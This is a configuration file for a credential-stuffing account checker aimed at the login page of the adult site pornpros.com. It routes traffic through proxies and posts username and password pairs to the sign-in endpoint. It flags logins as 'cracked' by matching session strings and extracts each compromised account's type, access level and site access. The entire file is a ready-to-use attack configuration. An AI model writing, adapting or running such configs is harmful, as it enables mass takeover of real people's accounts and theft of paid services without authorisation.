[Details]
Title=PornPros
Author=stex24
Version=1.0.2
ConnectionCount=3
UseProxies=1
CrackedString=primetime_vod=
InvalidString=>Login</button>
[Connection_1]
Host=pornpros.com
URL=/users/sign_in
PostData=user[username]=[user]&user[password]=[pass]&utf8=%26%23x2713%3B&user[site_id]=84&user[remember_me]=0
IsLogin=1
Method=1
ParseCount=0
ValidationString=_primetime_session=
[Connection_2]
Host=pornpros.com
URL=/video/full-service
ParseCount=1
[Connection_3]
Host=pornpros.com
URL=/fragments/user_info
ParseCount=2
[Parse_2_1]
Title=Account Type
InString=Rejoin Porn Pros today
IfFound=Expired
IfNotFound=Full
Type=1
[Parse_3_1]
Title=Status
SingleStart=access_level":"
SingleEnd=",
Type=2
[Parse_3_2]
Title=Available Sites
SingleStart="site_access":[
SingleEnd=]
Type=2
